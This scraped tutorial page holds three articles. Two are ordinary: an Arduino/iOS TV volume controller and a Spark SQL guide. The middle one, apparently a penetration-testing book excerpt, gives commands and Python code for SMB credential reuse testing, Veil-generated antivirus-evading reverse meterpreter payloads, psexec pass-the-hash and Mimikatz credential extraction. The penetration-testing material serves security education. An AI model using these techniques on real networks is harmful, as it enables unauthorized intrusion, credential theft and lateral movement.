desiredVolumeMaxDb are derived from the desiredVolumeDb. The most significant part of the code is in the viewDidLoad method (refer to the downloaded code). First, we instantiate the AudioEngine and get the default input node, which is the microphone, as follows: _audioEngine = [[AVAudioEngine alloc] init]; AVAudioInputNode *input = [_audioEngine inputNode]; The AVAudioEngine is a very powerful class, which allows digital audio signal processing. We are just going to scratch its capabilities. AVAudioEngine You can find out more about AVAudioEngine by visiting http://apple.co/1kExe35 (AVAudioEngine in practice) and http://apple.co/1WYG6Tp. The AVAudioEngine and other functions that we are going to use require that we add the following imports: #import <AVFoundation/AVFoundation.h> #import <Accelerate/Accelerate.h> By installing an audio tap on the bus for our input node, we can get the numeric representation of the signal that the iOS device is listening to, as follows: [input installTapOnBus:0 bufferSize:8192 format:[input inputFormatForBus:0] block:^(AVAudioPCMBuffer* buffer, AVAudioTime* when) { … … }]; As soon as a new buffer of data is available, the code block is called and the data can be processed. Now, we can take a look at the code that transforms the audio data samples into actual commands to control the TV set: for (UInt32 i = 0; i < buffer.audioBufferList->mNumberBuffers; i++) { Float32 *data = buffer.audioBufferList->mBuffers[i].mData; UInt32 numFrames = buffer.audioBufferList->mBuffers[i].mDataByteSize / sizeof(Float32); // Squares all the data values vDSP_vsq(data, 1, data, 1, numFrames*buffer.audioBufferList->mNumberBuffers); // Mean value of the squared data values: power of the signal float meanVal = 0.0; vDSP_meanv(data, 1, &meanVal, numFrames*buffer.audioBufferList->mNumberBuffers); // Signal power in Decibel float meanValDb = 10 * log10(meanVal); _actualVolumeDb = _actualVolumeDb + 0.2*(meanValDb - _actualVolumeDb); if (fabsf(_actualVolumeDb) < _desiredVolumeMinDb && _centralManager.state == CBCentralManagerStatePoweredOn && _sendCharacteristic != nil) { //printf("Decrease volumen"); NSData* data=[@"D" dataUsingEncoding:NSUTF8StringEncoding]; [_arduinoDevice writeValue:data forCharacteristic:_sendCharacteristic type:CBCharacteristicWriteWithoutResponse]; _increaseVolumeDelay = 0; } if (fabsf(_actualVolumeDb) > _desiredVolumeMaxDb && _centralManager.state == CBCentralManagerStatePoweredOn && _sendCharacteristic != nil) { _increaseVolumeDelay++; } if (_increaseVolumeDelay > 10) { //printf("Increase volumen"); _increaseVolumeDelay = 0; NSData* data=[@"I" dataUsingEncoding:NSUTF8StringEncoding]; [_arduinoDevice writeValue:data forCharacteristic:_sendCharacteristic type:CBCharacteristicWriteWithoutResponse]; } } In our case, the for cycle is executed just once because we have just one buffer and we are using only one channel. The power of a signal, represented by N samples, can be calculated by using the following formula: Here, v is the value of the nth signal sample. Because the power calculation has to performed in real time, we are going to use the following functions, which are provided by the Accelerated Framework: vDSP_vsq: This function calculates the square of each input vector element vDSP_meanv: This function calculates the mean value of the input vector elements The Accelerated Framework The Accelerated Framework is an essential tool that is used for digital signal processing. It saves you time in implementing the most used algorithms and mostly providing implementation of algorithms that are optimized in terms of memory footprint and performance. More information on the Accelerated Framework can be found at http://apple.co/1PYIKE8 and http://apple.co/1JCJWYh. Eventually, the signal power is stored in _actualVolumeDb. When the modulus of _actualVolumeDb is lower than the _desiredVolumeMinDb, the TV set's volume is too high, and we need to send a message to Arduino to reduce it. Don't forget that _actualVolumeDb is a negative number; the modulus decreases this number when the TV set's volume increases. Conversely, when the TV set's volume decreases, the _actualVolumeDb modulus increases, and when it gets higher than _desiredVolumeMaxDb, we need to send a message to Arduino to increase the TV set's volume. During pauses in dialogues, the power of the signal tends to decrease even if the volume of the speech is not changed. Without any adjustment, the increasing and decreasing messages are continuously sent to the TV set during dialogues. To avoid this misbehavior, we send the volume increase message. Only after this does the signal power stay over the threshold for some time (when _increaseVolumeDelay is greater than 10). We can take a look at the other view controller methods that are not complex. When the view belonging at the view controller appears, the following method is called: -(void)viewDidAppear:(BOOL)animated { [super viewDidAppear:animated]; NSError* error = nil; [self connect]; _actualVolumeDb = 0; [_audioEngine startAndReturnError:&error]; if (error) { NSLog(@"Error %@",[error description]); } } In this function, we connect to the Arduino board and start the audio engine in order to start listening to the TV set. When the view disappears from the screen, the viewDidDisappearmethod is called, and we disconnect from the Arduino and stop the audio engine, as follows: -(void)viewDidDisappear:(BOOL)animated { [self viewDidDisappear:animated]; [self disconnect]; [_audioEngine pause]; } The method that is called when the switch is operated (switchChanged) is pretty simple: - (IBAction)switchChanged:(UISwitch *)sender { NSError* error = nil; if (sender.on) { [_audioEngine startAndReturnError:&error]; if (error) { NSLog(@"Error %@",[error description]); } _volumeSlider.enabled = YES; } else { [_audioEngine stop]; _volumeSlider.enabled = NO; } } The method that is called when the volume slider changes is as follows: - (IBAction)volumeChanged:(UISlider *)sender { _desiredVolumeDb = 50.*(1-sender.value); _desiredVolumeMaxDb = _desiredVolumeDb + 2; _desiredVolumeMinDb = _desiredVolumeDb - 3; } We just set the desired volume and the lower and upper thresholds. The other methods that are used to manage the Bluetooth connection and data transfer don't require any explanation, because they are exactly like in the previous projects. Testing and tuning We are now ready to test our new amazing system and spend more and more time watching TV (or taking more and more naps!) Let's perform the following procedure: Load the Decoder.ino sketch and open the Arduino IDE console. Point your TV remote controller to the TSOP4838 receiver and press the button that increases the volume. You should see something like the following appearing on the console: For IR Scope: +4500 -4350 … For Arduino sketch: unsigned int raw[68] = {4500,4350,600,1650,600,1600,600,1600,…}; Copy all the values between the curly braces. Open the Arduino_VolumeController.ino and paste the values for the following: unsigned int up[68] = {9000, 4450, …..,}; Check whether the length of the two vectors (68 in the example) is the same and modify it, if needed. Point your TV remote controller to the TSOP4838 receiver and press the button that decreases the volume. Copy the values and paste them for: unsigned int down[68] = {9000, 4400, ….,}; Check whether the length of the two vectors (68 in the example) is the same and modify it, if needed. Upload the Arduino_VolumeController.ino to Arduino and point the IR LED towards the TV set. Open the iOS application, scan for the nRF8001, and then go to the main tab. Tap on connect and then set the desired volume by touching the slider. Now, you should see the blue LED and the green LED flashing. The TV set's volume should stabilize to the desired value. To check whether everything is properly working, increase the volume of the TV set by using the remote control; you should immediately see the blue LED flashing and the volume getting lower to the preset value. Similarly, by decreasing the volume with the remote control, you should see the green LED flashing and the TV set's volume increasing. Take a nap, and the commercials will not wake you up! How to go further The following are some improvements that can be implemented in this project: Changing channels and controlling other TV set functions. Catching handclaps to turn on or off the TV set. Adding a button to mute the TV set. Muting the TV set on receiving a phone call. Anyway, you can use the IR techniques that you have learned for many other purposes. Take a look at the other functions provided by the IRremote library to learn the other provided options. You can find all the available functions in the IRremote.h that is stored in the IRremote library folder. On the iOS side, try to experiment with the AV Audio Engine and the Accelerate Framework that is used to process signals. Summary This artcle focused on an easy but useful project and taught you how to use IR to transmit and receive data to and from Arduino. There are many different applications of the basic circuits and programs that you learned here. On the iOS platform, you learned the very basics of capturing sounds from the device microphone and the DSP (digital signal processing). This allows you to leverage the processing capabilities of the iOS platform to expand your Arduino projects. Resources for Article: Further resources on this subject: Internet Connected Smart Water Meter[article] Getting Started with Arduino[article] Programmable DC Motor Controller with an LCD [article]

0
0
12130

How-To Tutorials

article-image-exploiting-services-python

Packt

24 Sep 2015

15 min read

Exploiting Services with Python

Packt

24 Sep 2015

15 min read

In this article by Christopher Duffy author of the book Learning Python Penetration Testing, we will learn about one of the big misconceptions with testing for the synchronization of account credentials today, is the prevalence of exploitable. You will still find vulnerabilities that can be exploited by overflowing the stack or heap, they are just significantly reduced or more complex. (For more resources related to this topic, see here.) Testing for the synchronization of account credentials With these results, we can determine if any of these credentials are reused in the network. We know there are Windows hosts primarily in the target network, but we need to identify which ones have port 445 open. We can then try and determine, which accounts might grant us access, when the following command is run: nmap -sS -vvv -p445 192.168.195.0/24 -oG output Then, parse the results for open ports with the following command, which will provide a file of target hosts with Server Message Block (SMB) enabled. grep 445/open output| cut -d" " -f2 >> smb_hosts The passwords can be extracted directly from John and written a password file that can be used for follow-on service attacks. john --show unshadowed |cut -d: -f2|grep -v " " > passwords Always test on a single host the first time you run this type of attack. In this example, we are using the sys account, but it is more common to use the root account or similar administrative accounts to test password reuse (synchronization) in an environment. The following attack using auxiliary/scanner/smb/smb_enumusers_domain will check for two things. It will identify what systems this account has access to, and the relevant users that are currently logged into the system. In the second portion of this example, we will highlight how to identify the accounts that are actually privileged and part of the Domain. There are good points and bad points about the smb_enumusers_domain module. The bad points are that you cannot load multiple usernames and passwords into it. That capability is reserved for the smb_login module. The problem with smb_login is that it is extremely noisy, as many signature detection tools flag on this method of testing for logins. The third module smb_enumusers, which can be used, but it only provides details related to locale users as it identifies users based on the Security Accounts Manager (SAM) file contents. So, if a user has a Domain account and has logged into the box, the smb_enumusers module will not identify them. So, understand each module and its limitations when identifying targets to laterally move. We are going to highlight how to configure the smb_enumusers_domain module and execute it. This will show an example of gaining access to a vulnerable host and then verifying DA account membership. This information can then be used to identify where a DA is located so that Mimikatz can be used to extract credentials. For this example, we are going to use a custom exploit using Veil as well, to attempt to bypass a resident Host Intrusion Prevention System (HIPS). More information about Veil can be found here at https://github.com/Veil-Framework/Veil-Evasion.git. So, we configure the module to use the password batman, and we target the local administrator account on the system. This can be changed, but often the default is used. Since it is the local administrator, the Domain is set to WORKGROUP. The following figure shows the configuration of the module: Before running commands such as these, make sure to use spool, to output the results to a log file so you can go back and review the results. As you can see in the following figure, the account provided details about who was logged into the system. This means that there are logged in users relevant to the returned account names and that the local administrator account will work on that system. This means this system is ripe for compromise by a Pass-the-Hash attack (PtH). The psexec module allows you to either pass the extracted Local Area Network Manager (LM): New Technology LM (NTLM) hash and username combination or just the username password pair to get access. To begin with, we setup a custom multi/handler to catch the custom exploit we generated by Veil as shownfollowing. Keep in mind, I used 443 for the local port because it bypasses most HIPS and the local host will change depending on your host. Now, we need to generate custom payloads with Veil to be used with the psexec module. You can do this by navigating to the Veil-Evasion installation directory and running it with python Veil-Evasion.py. Veil has a good number of payloads that can be generated with a variety of obfuscation or protection mechanisms, to see the specific payload you want to use, to execute the list command. You can select the payload by typing in the number of the payload or the name. As an example, run the following commands to generate a C Sharp stager that does not use shell code, keep in mind this requires specific versions of .NET on the target box to work. use cs/meterpreter/rev_tcp set LPORT 443 set LHOST 192.168.195.160 set use_arya Y generate There are two components to a typical payload, the stager and the stage. A stager sets up the network connection between the attacker and the victim. Payloads that often use native system languages can be purely stager. The second part is the stage, which are the components that are downloaded by the stager. These can include things like your Meterpreter. If both items are combined, they are called a single; think about when you create your malicious Universal Serial Bus (USB) drives, these are often singles. The output will be an executable, that will spawn an encrypted reverse HyperText Transfer Protocol Secure (HTTPS) Meterpreter. The payload can be tested with the script checkvt, which safely verifies if the payload would be picked up by most HIPS solutions. It does this without uploading it to Virus Total, and in turn does not add the payload to the database, which many HIPS providers pull from. Instead, it compares the hash of the payload to those already in the database. Now, we can setup the psexec module to reference the custom payload for execution. Update the psexec module, so that it uses the custom payload generated by Veil-Evasion, via set EXE::Custom and disable the automatic payload handler with set DisablePayloadHandler true, as shown following: Exploit the target box, and then attempt to identify who the DAs are in the Domain. This can be done in one of two ways, either by using the post/windows/gather/enum_domain_group_users module or the following command from shell access. net group "Domain Admins" We can then Grep through the spooled output file from the previously run module to locate relevant systems that might have these Das logged into. When gaining access to one of those systems, there would likely be DA tokens or credentials in memory, which can be extracted and reused. The following command is an example of how to analyze the log file for these types of entries. grep <username> <spoofile.log> As you can see, this very simple exploit path allows you to identify where the DAs are. Once you are on the system all you have to do is load mimikatz and extract the credentials typically with the wdigest command from the established Meterpreter session. Of course, this means the system has to be newer than Windows 2000, and have active credentials in memory. If not, it will take additional effort and research to move forward. To highlight this, we use our established session to extract credentials with Mimikatz as you can see following. The credentials are in memory and since the target box was Windows XP machine, we have no conflicts and no additional research is required. In addition to the intelligence we have gathered from extracting the active DA list from the system, we now have another set of confirmed credentials that can be used. Rinsing and repeating this method of attack allows you to quickly move laterally around the network till you identify viable targets. Automating the exploit train with Python This exploit train is relatively simple, but we can automate a portion of this with the Metasploit Remote Procedure Call (MSFRPC). This script will use the nmap library to scan for active ports of 445, then generate a list of targets to test using a username and password passed via argument to the script. The script will use the same smb_enumusers_domain module to identify boxes that have the credentials reused and other viable users logged into them. First, we need to install SpiderLabs msfrpc library for Python. This library can be found here at https://github.com/SpiderLabs/msfrpc.git. The script we are creating uses the netifaces library to identify what interface IP addresses belong to your host. It then scans for port 445 the SMB port on the IP address, range, or the Classes Inter Domain Routing (CIDR) address. It eliminates any IP addresses that belong to your interface and then tests the credentials using the Metasploit module auxiliary/scanner/smb/smb_enumusers_domain. At the same time, it verifies what users are logged onto the system. The outputs of this script in addition to real time response are two files, a log file that contains all the responses, and a file that holds the IP addresses for all the hosts that have SMB services. This Metasploit module takes advantage of RPCDCE, which does not run on port 445, but we are verifying that the service is available for follow-on exploitation. This file could then be fed back into the script, if you as an attacker find other credential sets to test as shown following: Lastly, the script can be passed hashes directly just like the Metasploit module as shown following: The output will be slightly different for each running of the script, depending on the console identifier you grab to execute the command. The only real difference will be the additional banner items typical with a Metasploit console initiation. Now there are a couple things that have to be stated, yes you could just generate a resource file, but when you start getting into organizations that have millions of IP addresses, this becomes unmanageable. Also the MSFRPC can have resource files fed directly into it as well, but it can significantly slow the process. If you want to compare, rewrite this script to do the same test as the previous ssh_login.py script you wrote, but with direct MSFRPC integration. Like all scripts libraries are needed to be established, most of these you are already familiar with, the newest one relates to the MSFRPC by SpiderLabs. The required libraries for this script can be seen as follows: import os, argparse, sys, time try: import msfrpc except: sys.exit("[!] Install the msfrpc library that can be found here: https://github.com/SpiderLabs/msfrpc.git") try: import nmap except: sys.exit("[!] Install the nmap library: pip install python- nmap") try: import netifaces except: sys.exit("[!] Install the netifaces library: pip install netifaces") We then build a module, to identify relevant targets that are going to have the auxiliary module run against it. First, we setup the constructors and the passed parameters. Notice that we have two service names to test against for this script, microsoft-ds and netbios-ssn, as either one could represent port 445 based on the nmap results. def target_identifier(verbose, dir, user, passwd, ips, port_num, ifaces, ipfile): hostlist = [] pre_pend = "smb" service_name = "microsoft-ds" service_name2 = "netbios-ssn" protocol = "tcp" port_state = "open" bufsize = 0 hosts_output = "%s/%s_hosts" % (dir, pre_pend) After which, we configure the nmap scanner to scan for details either by file or by command line. Notice that the hostlist is a string of all the addresses loaded by the file, and they are separated by spaces. The ipfile is opened and read and then all newlines are replaced with spaces as they are loaded into the string. This is a requirement for the specific hosts argument of the nmap library. if ipfile != None: if verbose > 0: print("[*] Scanning for hosts from file %s") % (ipfile) with open(ipfile) as f: hostlist = f.read().replace('n',' ') scanner.scan(hosts=hostlist, ports=port_num) else: if verbose > 0: print("[*] Scanning for host(s) %s") % (ips) scanner.scan(ips, port_num) open(hosts_output, 'w').close() hostlist=[] if scanner.all_hosts(): e = open(hosts_output, 'a', bufsize) else: sys.exit("[!] No viable targets were found!") The IP addresses for all of the interfaces on the attack system are removed from the test pool. for host in scanner.all_hosts(): for k,v in ifaces.iteritems(): if v['addr'] == host: print("[-] Removing %s from target list since it belongs to your interface!") % (host) host = None Finally, the details are then written to the relevant output file and python lists, and then returned to the original call origin. if host != None: e = open(hosts_output, 'a', bufsize) if service_name or service_name2 in scanner[host][protocol][int(port_num)]['name']: if port_state in scanner[host][protocol][int(port_num)]['state']: if verbose > 0: print("[+] Adding host %s to %s since the service is active on %s") % (host, hosts_output, port_num) hostdata=host + "n" e.write(hostdata) hostlist.append(host) else: if verbose > 0: print("[-] Host %s is not being added to %s since the service is not active on %s") % (host, hosts_output, port_num) if not scanner.all_hosts(): e.closed if hosts_output: return hosts_output, hostlist The next function creates the actual command that will be executed; this function will be called for each host the scan returned back as a potential target. def build_command(verbose, user, passwd, dom, port, ip): module = "auxiliary/scanner/smb/smb_enumusers_domain" command = '''use ''' + module + ''' set RHOSTS ''' + ip + ''' set SMBUser ''' + user + ''' set SMBPass ''' + passwd + ''' set SMBDomain ''' + dom +''' run ''' return command, module The last function actually initiates the connection with the MSFRPC and executes the relevant command per specific host. def run_commands(verbose, iplist, user, passwd, dom, port, file): bufsize = 0 e = open(file, 'a', bufsize) done = False The script creates a connection with the MSFRPC and creates console then tracks it by a specific console_id. Do not forget, the msfconsole can have multiple sessions, and as such we have to track our session to a console_id. client = msfrpc.Msfrpc({}) client.login('msf','msfrpcpassword') try: result = client.call('console.create') except: sys.exit("[!] Creation of console failed!") console_id = result['id'] console_id_int = int(console_id) The script then iterates over the list of IP addresses that were confirmed to have an active SMB service. The script then creates the necessary commands for each of those IP addresses. for ip in iplist: if verbose > 0: print("[*] Building custom command for: %s") % (str(ip)) command, module = build_command(verbose, user, passwd, dom, port, ip) if verbose > 0: print("[*] Executing Metasploit module %s on host: %s") % (module, str(ip)) The command is then written to the console and we wait for the results. client.call('console.write',[console_id, command]) time.sleep(1) while done != True: We await the results for each command execution and verify the data that has been returned and that the console is not still running. If it is, we delay the reading of the data. Once it has completed, the results are written in the specified output file. result = client.call('console.read',[console_id_int]) if len(result['data']) > 1: if result['busy'] == True: time.sleep(1) continue else: console_output = result['data'] e.write(console_output) if verbose > 0: print(console_output) done = True We close the file and destroy the console to clean up the work we had done. e.closed client.call('console.destroy',[console_id]) The final pieces of the script are related to setting up the arguments, setting up the constructors and calling the modules. These components are similar to previous scripts and have not been included here for the sake of space, but the details can be found at the previously mentioned location on GitHub. The last requirement is loading of the msgrpc at the msfconsole with the specific password that we want. So launch the msfconsole and then execute the following within it. load msgrpc Pass=msfrpcpassword The command was not mistyped, Metasploit has moved to msgrpc verses msfrpc, but everyone still refers to it as msfrpc. The big difference is the msgrpc library uses POST requests to send data while msfrpc used eXtensible Markup Language (XML). All of this can be automated with resource files to set up the service. Summary In this article, we highlighted a manner in which you can move through a sample environment. Specifically, how to exploit a relative box, escalate privileges, and extract additional credentials. From that position, we identified other viable hosts we could laterally move into and the users who were currently logged into them. We generated custom payloads with the Veil Framework to bypass HIPS, and executed a PtH attack. This allowed us to extract other credentials from memory with the tool Mimikatz. We then automated the identification of viable secondary targets and the users logged into them with Python and MSFRPC. Resources for Article: Further resources on this subject: Basics of Jupyter Notebook and Python[article] Scraping the Data[article] Modeling complex functions with artificial neural networks [article]

0
0
16067

How-To Tutorials

Packt

24 Sep 2015

11 min read

Integration with Spark SQL

Packt

24 Sep 2015

11 min read

In this article by Sumit Gupta, the author of the book Learning Real-time Processing with Spark Streaming, we will discuss the integration of Spark Streaming with various other advance Spark libraries such as Spark SQL. (For more resources related to this topic, see here.) No single software in today's world can fulfill the varied, versatile, and complex demands/needs of the enterprises, and to be honest, neither should it! Software are made to fulfill specific needs arising out of the enterprises at a particular point in time, which may change in future due to many other factors. These factors may or may not be controlled like government policies, business/market dynamics, and many more. Considering all these factors integration and interoperability of any software system with internal/external systems/software's is pivotal in fulfilling the enterprise needs. Integration and interoperability are categorized as nonfunctional requirements, which are always implicit and may or may not be explicitly stated by the end users. Over the period of time, architects have realized the importance of these implicit requirements in modern enterprises, and now, all enterprise architectures provide support due diligence and provisions in fulfillment of these requirements. Even the enterprise architecture frameworks such as The Open Group Architecture Framework (TOGAF) defines the specific set of procedures and guidelines for defining and establishing interoperability and integration requirements of modern enterprises. Spark community realized the importance of both these factors and provided a versatile and scalable framework with certain hooks for integration and interoperability with the different systems/libraries; for example; data consumed and processed via Spark streams can also be loaded into the structured (table: rows/columns) format and can be further queried using SQL. Even the data can be stored in the form of Hive tables in HDFS as persistent tables, which will exist even after our Spark program has restarted. In this article, we will discuss querying streaming data in real time using Spark SQL. Querying streaming data in real time Spark Streaming is developed on the principle of integration and interoperability where it not only provides a framework for consuming data in near real time from varied data sources, but at the same time, it also provides the integration with Spark SQL where existing DStreams can be converted into structured data format for querying using standard SQL constructs. There are many such use cases where SQL on streaming data is a much needed feature; for example, in our distributed log analysis use case, we may need to combine the precomputed datasets with the streaming data for performing exploratory analysis using interactive SQL queries, which is difficult to implement only with streaming operators as they are not designed for introducing new datasets and perform ad hoc queries. Moreover SQL's success at expressing complex data transformations derives from the fact that it is based on a set of very powerful data processing primitives that do filtering, merging, correlation, and aggregation, which is not available in the low-level programming languages such as Java/ C++ and may result in long development cycles and high maintenance costs. Let's move forward and first understand few things about Spark SQL, and then, we will also see the process of converting existing DStreams into the Structured formats. Understanding Spark SQL Spark SQL is one of the modules developed over the Spark framework for processing structured data, which is stored in the form of rows and columns. At a very high level, it is similar to the data residing in RDBMS in the form rows and columns, and then SQL queries are executed for performing analysis, but Spark SQL is much more versatile and flexible as compared to RDBMS. Spark SQL provides distributed processing of SQL queries and can be compared to frameworks Hive/Impala or Drill. Here are the few notable features of Spark SQL: Spark SQL is capable of loading data from variety of data sources such as text files, JSON, Hive, HDFS, Parquet format, and of course RDBMS too so that we can consume/join and process datasets from different and varied data sources. It supports static and dynamic schema definition for the data loaded from various sources, which helps in defining schema for known data structures/types, and also for those datasets where the columns and their types are not known until runtime. It can work as a distributed query engine using the thrift JDBC/ODBC server or command-line interface where end users or applications can interact with Spark SQL directly to run SQL queries. Spark SQL provides integration with Spark Streaming where DStreams can be transformed into the structured format and further SQL Queries can be executed. It is capable of caching tables using an in-memory columnar format for faster reads and in-memory data processing. It supports Schema evolution so that new columns can be added/deleted to the existing schema, and Spark SQL still maintains the compatibility between all versions of the schema. Spark SQL defines the higher level of programming abstraction called DataFrames, which is also an extension to the existing RDD API. Data frames are the distributed collection of the objects in the form of rows and named columns, which is similar to tables in the RDBMS, but with much richer functionality containing all the previously defined features. The DataFrame API is inspired by the concepts of data frames in R (http://www.r-tutor.com/r-introduction/data-frame) and Python (http://pandas.pydata.org/pandas-docs/stable/dsintro.html#dataframe). Let's move ahead and understand how Spark SQL works with the help of an example: As a first step, let's create sample JSON data about the basic information about the company's departments such as Name, Employees, and so on, and save this data into the file company.json. The JSON file would look like this: [ { "Name":"DEPT_A", "No_Of_Emp":10, "No_Of_Supervisors":2 }, { "Name":"DEPT_B", "No_Of_Emp":12, "No_Of_Supervisors":2 }, { "Name":"DEPT_C", "No_Of_Emp":14, "No_Of_Supervisors":3 }, { "Name":"DEPT_D", "No_Of_Emp":10, "No_Of_Supervisors":1 }, { "Name":"DEPT_E", "No_Of_Emp":20, "No_Of_Supervisors":5 } ] You can use any online JSON editor such as http://codebeautify.org/online-json-editor to see and edit data defined in the preceding JSON code. Next, let's extend our Spark-Examples project and create a new package by the name chapter.six, and within this new package, create a new Scala object and name it as ScalaFirstSparkSQL.scala. Next, add the following import statements just below the package declaration: import org.apache.spark.SparkConf import org.apache.spark.SparkContext import org.apache.spark.sql._ import org.apache.spark.sql.functions._ Further, in your main method, add following set of statements to create SQLContext from SparkContext: //Creating Spark Configuration val conf = new SparkConf() //Setting Application/ Job Name conf.setAppName("My First Spark SQL") // Define Spark Context which we will use to initialize our SQL Context val sparkCtx = new SparkContext(conf) //Creating SQL Context val sqlCtx = new SQLContext(sparkCtx) SQLContext or any of its descendants such as HiveContext—for working with Hive tables or CassandraSQLContext—for working with Cassandra tables is the main entry point for accessing all functionalities of Spark SQL. It allows the creation of data frames, and also provides functionality to fire SQL queries over data frames. Next, we will define the following code to load the JSON file (company.json) using the SQLContext, and further, we will also create a data frame: //Define path of your JSON File (company.json) which needs to be processed val path = "/home/softwares/spark/data/company.json"; //Use SQLCOntext and Load the JSON file. //This will return the DataFrame which can be further Queried using SQL queries. val dataFrame = sqlCtx.jsonFile(path) In the preceding piece of code, we used the jsonFile(…) method for loading the JSON data. There are other utility method defined by SQLContext for reading raw data from filesystem or creating data frames from the existing RDD and many more. Spark SQL supports two different methods for converting the existing RDDs into data frames. The first method uses reflection to infer the schema of an RDD from the given data. This approach leads to more concise code and helps in instances where we already know the schema while writing Spark application. We have used the same approach in our example. The second method is through a programmatic interface that allows to construct a schema. Then, apply it to an existing RDD and finally generate a data frame. This method is more verbose, but provides flexibility and helps in those instances where columns and data types are not known until the data is received at runtime. Refer to https://spark.apache.org/docs/1.3.0/api/scala/index.html#org.apache.spark.sql.SQLContext for a complete list of methods exposed by SQLContext. Once the DataFrame is created, we need to register DataFrame as a temporary table within the SQL context so that we can execute SQL queries over the registered table. Let's add the following piece of code for registering our DataFrame with our SQL context and name it company: //Register the data as a temporary table within SQL Context //Temporary table is destroyed as soon as SQL Context is destroyed. dataFrame.registerTempTable("company"); And we are done… Our JSON data is automatically organized into the table (rows/column) and is ready to accept the SQL queries. Even the data types is inferred from the type of data entered within the JSON file itself. Now, we will start executing the SQL queries on our table, but before that let's see the schema being created/defined by SQLContext: //Printing the Schema of the Data loaded in the Data Frame dataFrame.printSchema(); The execution of the preceding statement will provide results similar to mentioned illustration: The preceding illustration shows the schema of the JSON data loaded by Spark SQL. Pretty simple and straight, isn't it? Spark SQL has automatically created our schema based on the data defined in our company.json file. It has also defined the data type of each of the columns. We can also define the schema using reflection (https://spark.apache.org/docs/1.3.0/sql-programming-guide.html#inferring-the-schema-using-reflection) or can also programmatically define the schema (https://spark.apache.org/docs/1.3.0/sql-programming-guide.html#inferring-the-schema-using-reflection). Next, let's execute some SQL queries to see the data stored in DataFrame, so the first SQL would be to print all records: //Executing SQL Queries to Print all records in the DataFrame println("Printing All records") sqlCtx.sql("Select * from company").collect().foreach(print) The execution of the preceding statement will produce the following results on the console where the driver is executed: Next, let's also select only few columns instead of all records and print the same on console: //Executing SQL Queries to Print Name and Employees //in each Department println("n Printing Number of Employees in All Departments") sqlCtx.sql("Select Name, No_Of_Emp from company").collect().foreach(println) The execution of the preceding statement will produce the following results on the Console where the driver is executed: Now, finally let's do some aggregation and count the total number of all employees across the departments: //Using the aggregate function (agg) to print the //total number of employees in the Company println("n Printing Total Number of Employees in Company_X") val allRec = sqlCtx.sql("Select * from company").agg(Map("No_Of_Emp"->"sum")) allRec.collect.foreach ( println ) In the preceding piece of code, we used the agg(…) function and performed the sum of all employees across the departments, where sum can be replaced by avg, max, min, or count. The execution of the preceding statement will produce the following results on the console where the driver is executed: The preceding images shows the results of executing the aggregation on our company.json data. Refer to the Data Frame API at https://spark.apache.org/docs/1.3.0/api/scala/index.html#org.apache.spark.sql.DataFrame for further information on the available functions for performing aggregation. As a last step, we will stop our Spark SQL context by invoking the stop() function on SparkContext—sparkCtx.stop(). This is required so that your application can notify master or resource manager to release all resources allocated to the Spark job. It also ensures the graceful shutdown of the job and avoids any resource leakage, which may happen otherwise. Also, as of now, there can be only one Spark context active per JVM, and we need to stop() the active SparkContext class before creating a new one. Summary In this article, we have seen the step-by-step process of using Spark SQL as a standalone program. Though we have considered JSON files as an example, but we can also leverage Spark SQL with Cassandra (https://github.com/datastax/spark-cassandra-connector/blob/master/doc/2_loading.md) or MongoDB (https://github.com/Stratio/spark-mongodb) or Elasticsearch (http://chapeau.freevariable.com/2015/04/elasticsearch-and-spark-1-dot-3.html). Resources for Article: Further resources on this subject: Getting Started with Apache Spark DataFrames[article] Sabermetrics with Apache Spark[article] Getting Started with Apache Spark [article]

0
0
4455

Deploying on your own server

Data Around Us

Oracle API Management Implementation 12c

Designing and Building a vRealize Automation 6.2 Infrastructure

Lights and Effects

Learning RethinkDB

Creating TFS Scheduled Jobs

Using Node.js and Hadoop to store distributed data

Building JSF Forms

The Dashboard Design – Best Practices

Trending Topics

Introducing R, RStudio, and Shiny

Patterns of Traversing

TV Set Constant Volume Controller

Exploiting Services with Python

Integration with Spark SQL

Create a Free Account To Continue Reading

Sign in to activate your 7-day free access